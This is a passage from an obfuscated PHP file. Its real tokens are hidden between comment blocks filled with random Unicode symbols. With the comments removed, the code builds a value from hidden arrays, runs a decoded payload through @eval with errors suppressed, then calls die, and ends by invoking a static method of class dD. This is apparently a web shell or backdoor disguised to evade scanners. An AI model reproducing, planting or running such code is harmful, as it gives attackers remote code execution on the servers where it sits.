)/*-H-*///
 ): /*-,>}i-*///
$dQWMPAeoB /*-
♯⋷ℳ㈤☼ⓡ⋿℃≪﹣□❸
L:{7fte♯⋷ℳ㈤☼ⓡ⋿℃≪﹣□❸
-*///
=/*-3I56-*///
 self/*-


⓺↹ℌ⋙ⓐ⇊┟❂◓


^@WIcG⓺↹ℌ⋙ⓐ⇊┟❂◓


-*///
::/*-
┸≻㈢⇨▐﹛⇪❊⊍┭
42?#3@TbF┸≻㈢⇨▐﹛⇪❊⊍┭
-*///
aY/*-Zns-*///
(/*-


➴┑➄ⓕ


Kh➴┑➄ⓕ


-*///
$XbvHWGTP/*-1Ko-*///
[/*-


⋧⋹╟✉ℙ∟➒⒜▾¥︼⒣


Fx|yl4_g⋧⋹╟✉ℙ∟➒⒜▾¥︼⒣


-*///
1+0/*-{5[-*///
], /*-9u,-*///
$FfD/*-^f]!{-*///
[/*-

ⅷ❺╁㊋➞↗⊛Ⓝ↉◥◖㊙

xdg!ⅷ❺╁㊋➞↗⊛Ⓝ↉◥◖㊙

-*///
3+2/*-


ⓔ▰㊬☈▕Ↄ☷☻˜✔∇≪♙⅚Ⅰ⇆㊦


u01Y$@w5ⓔ▰㊬☈▕Ↄ☷☻˜✔∇≪♙⅚Ⅰ⇆㊦


-*///
]/*-H-*///
);/*-9ap4_-*///
@eval/*-fUYptDU8-*///
(/*-
⊄➍❋⑴﹄┒◚⓪Ü▤ㄨ［⋰◒^∖
H6WkV[⊄➍❋⑴﹄┒◚⓪Ü▤ㄨ［⋰◒^∖
-*///
$FfD/*-


◊★ⓛ#≙⋛╁⇘︹▌┆➄Ⓦ—⅑↖Ⅾ╍┃┣⒲㊭➚℅✷╋☴Ü£♝


<0H]HQ◊★ⓛ#≙⋛╁⇘︹▌┆➄Ⓦ—⅑↖Ⅾ╍┃┣⒲㊭➚℅✷╋☴Ü£♝


-*///
[/*-KNC-*///
1+3/*-@@)-*///
]/*-bObn-*///
(/*-xd-a)KDc-*///
$dQWMPAeoB/*-

≅⒫⒴⊶

)8k≅⒫⒴⊶

-*///
)/*-

⅒‱✖⑫←Ⅰ℮▕⅗╢┲Ⅴ⊬▾▪↫ⅹ%┯⓪▼⊓⋑↩➢⅓Ⓚ

J`t_R<:VQ⅒‱✖⑫←Ⅰ℮▕⅗╢┲Ⅴ⊬▾▪↫ⅹ%┯⓪▼⊓⋑↩➢⅓Ⓚ

-*///
);/*-<Wbtijf`-*///
/*-


↭⇃≿㊟↩⓮❑㊅⊨❏┼⊧▕


hL}Zehk↭⇃≿㊟↩⓮❑㊅⊨❏┼⊧▕


-*///
die;/*-#ezx=I<-*///
 endif;/*-3:nG!-*///
 }/*-9PGZ3unPe-*///
}/*-Xg]@v7=-*///
dD/*-

︷☰⋹⑵⒖┛➂/╞⌖◪▵⓳┑≗

R4Nn!0c,L︷☰⋹⑵⒖┛➂/╞⌖◪▵⓳┑≗

-*///
::/*-i5>-*///
aXrcUJCiw/*-q#&T>dX-*///
();/*-
➻◂▰
sdGf%➻◂▰
-*///
 ?>